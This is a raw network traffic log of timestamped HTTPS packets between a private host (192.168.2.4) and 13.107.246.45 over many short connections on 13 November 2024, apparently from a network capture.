Nov 13, 2024 18:44:06.768429995 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.768471003 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:06.768542051 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.768867970 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:06.768889904 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.067264080 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.067795992 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.067858934 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.068223000 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.068279028 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.199265957 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.199474096 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.199728966 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.199728966 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.199728966 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.202044010 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.202136040 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.203896046 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.203896046 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.204031944 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.284380913 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.288139105 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.288203001 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.288397074 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.288412094 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.513092995 CET	49749	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.513159037 CET	443	49749	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.624152899 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.624219894 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.624382973 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.624471903 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.624471903 CET	49748	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.624512911 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.624546051 CET	443	49748	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.626547098 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.626585007 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.626650095 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.626687050 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.626781940 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.626792908 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.627145052 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.627233982 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.627595901 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.627651930 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.762485981 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.763041973 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.763077021 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.763391972 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.763411999 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.763511896 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.763591051 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.763700962 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.763700962 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.763780117 CET	49750	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.763814926 CET	443	49750	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.766182899 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.766272068 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.766364098 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.766479969 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.766520977 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.769382954 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.769687891 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.769701958 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.770072937 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.770080090 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.900043964 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.900754929 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.900978088 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.900979042 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.900979042 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.903208971 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.903310061 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.903403044 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.903529882 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.903553009 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.906838894 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.909338951 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.909398079 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.909456968 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.909476995 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.909492016 CET	49752	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.909498930 CET	443	49752	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.911324978 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.911413908 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.911505938 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.911832094 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.911919117 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.941570997 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.942034960 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.942099094 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:07.942328930 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:07.942343950 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.076761007 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.076849937 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.076929092 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.088017941 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.088018894 CET	49753	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.088089943 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.088126898 CET	443	49753	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.155596018 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.155699968 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.155791044 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.162168026 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.162204981 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.216228962 CET	49751	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.216326952 CET	443	49751	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.478579044 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.479233980 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.479249954 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.479659081 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.479664087 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.569060087 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.569519997 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.569586039 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.569891930 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.569947958 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.608161926 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.608741999 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.608848095 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.608875990 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.608897924 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.608906031 CET	49754	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.608911037 CET	443	49754	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.611620903 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.611709118 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.611789942 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.611890078 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.611910105 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.700388908 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.700535059 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.700712919 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.700824022 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.700870991 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.700901985 CET	49755	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.700918913 CET	443	49755	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.704158068 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.704252958 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.704405069 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.704560041 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.704586029 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.721499920 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.721853018 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.721878052 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.722292900 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.722301960 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.723766088 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.724033117 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.724064112 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.724349976 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.724356890 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.851835966 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.851897955 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.851942062 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.852066040 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.852082014 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.852096081 CET	49757	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.852102995 CET	443	49757	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.854365110 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.854401112 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.854460955 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.854568958 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.854578018 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.855655909 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.855870962 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.855931997 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.855978012 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.856015921 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.856055975 CET	49756	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.856071949 CET	443	49756	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.857847929 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.857940912 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.858040094 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.858148098 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.858170033 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.965872049 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.966428041 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.966448069 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:08.966816902 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:08.966821909 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.096575022 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.096735001 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.096877098 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.098939896 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.098939896 CET	49758	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.098963022 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.098975897 CET	443	49758	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.099025965 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.099069118 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.099258900 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.099339962 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.099354982 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.350379944 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.350847006 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.350893974 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.351212025 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.351219893 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.481554985 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.482383966 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.482460022 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.482494116 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.482510090 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.482522011 CET	49759	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.482528925 CET	443	49759	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.484904051 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.484993935 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.485081911 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.485208035 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.485234022 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.601361036 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.604142904 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.604202986 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.604563951 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.604577065 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.605454922 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.607125044 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.607155085 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.607485056 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.607492924 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.678047895 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.679990053 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.680007935 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.680311918 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.680321932 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.732196093 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.732578039 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.732639074 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.732686043 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.732716084 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.732758999 CET	49762	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.732774973 CET	443	49762	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.734965086 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.735054970 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.735146046 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.735285997 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.735308886 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.738586903 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.738799095 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.738856077 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.738898993 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.738898993 CET	49761	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.738919020 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.738931894 CET	443	49761	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.740628004 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.740669966 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.740969896 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.741027117 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.741040945 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.848690987 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.849270105 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.849303007 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.849626064 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.849653959 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.980422974 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.980617046 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.980829000 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.980829000 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.980829000 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.982661009 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.982745886 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:09.982984066 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.982984066 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:09.983063936 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.231296062 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.232119083 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.232183933 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.232470989 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.232528925 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.294356108 CET	49763	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.294389009 CET	443	49763	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.344930887 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.345093012 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.345179081 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.345339060 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.345339060 CET	49760	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.345383883 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.345412016 CET	443	49760	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.347518921 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.347558022 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.347702026 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.347819090 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.347827911 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.364480972 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.364630938 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.364837885 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.364837885 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.364922047 CET	49764	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.364959955 CET	443	49764	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.366837025 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.366925001 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.367060900 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.367149115 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.367172956 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.496299028 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.510046959 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.542810917 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.542856932 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.543504953 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.543513060 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.543926954 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.543989897 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.544785023 CET	49766	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.544841051 CET	443	49766	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.671345949 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.671576977 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.671719074 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.672185898 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.672185898 CET	49765	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.672221899 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.672239065 CET	443	49765	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.678100109 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.678133965 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.678194046 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.678333044 CET	49770	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.678342104 CET	443	49770	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.730657101 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.747092962 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.747138023 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.747700930 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.747709036 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.877549887 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.877741098 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.877810001 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.877866983 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.877866983 CET	49767	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.877902985 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.877928972 CET	443	49767	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.880047083 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.880137920 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:10.880229950 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.880336046 CET	49771	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:10.880357981 CET	443	49771	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.099272013 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.100168943 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.100209951 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.100507975 CET	49768	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.100534916 CET	443	49768	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.122407913 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.123241901 CET	49769	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:11.123306036 CET	443	49769	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:11.123394966 CET	49769	443	192.168.2.4	13.107.246.45
